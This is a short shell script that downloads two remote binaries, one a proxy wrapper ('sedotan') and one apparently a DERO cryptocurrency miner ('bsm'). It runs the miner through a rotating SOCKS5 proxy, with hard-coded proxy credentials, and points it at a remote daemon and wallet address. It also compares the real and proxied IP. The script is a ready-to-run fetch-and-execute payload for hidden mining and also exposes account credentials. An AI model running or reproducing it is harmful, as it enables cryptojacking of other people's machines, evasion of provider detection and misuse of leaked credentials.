wget -q https://gitlab.com/cibogo/tools/-/raw/main/sedotan
chmod +x sedotan
echo "IP ASLI ======>"$(curl ifconfig.me) 
echo "IP TOR ======>"$(./sedotan --socks5=p.webshare.io:80 --socks5_username=fzkpmlgg-rotate --socks5_password=afz2p7petws2 curl ifconfig.me) 
wget -qO https://github.com/joykotest/kadal/blob/main/oreng?raw=true bsm
./sedotan --socks5=p.webshare.io:80 --socks5_username=fzkpmlgg-rotate --socks5_password=afz2p7petws2 ./bsm --daemon-rpc-address=64.227.11.138:10100 --wallet-address=dero1qy3k9h7fuw3ky9v8g4c4urs5s8c6gafqtmy2xfju98ty483kgyyy5qg4effk0




